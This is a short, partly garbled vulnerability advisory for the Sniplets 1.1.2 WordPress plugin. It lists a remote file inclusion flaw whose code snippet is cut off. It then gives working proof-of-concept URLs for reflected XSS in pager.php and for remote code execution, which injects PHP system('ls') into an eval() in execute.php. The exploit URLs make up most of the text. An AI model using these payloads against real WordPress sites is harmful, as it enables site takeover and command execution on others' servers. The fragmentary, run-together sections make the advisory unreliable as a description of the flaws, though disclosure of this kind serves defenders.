######################## Wordpress Plugin Sniplets 1.1.2 Multiple Vulnerabilities by NBBN ######################## 1) Remote File Inclusion File: /modules/syntax_highlight.php Register Globals: ON Vuln code: "/> http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/pager.php?page=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E 3) Remote Code Execution Register Globals: ON Code: '.$text; eval ('?>'.$text); ?> Poc: http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3C?php%20system(%22ls%22);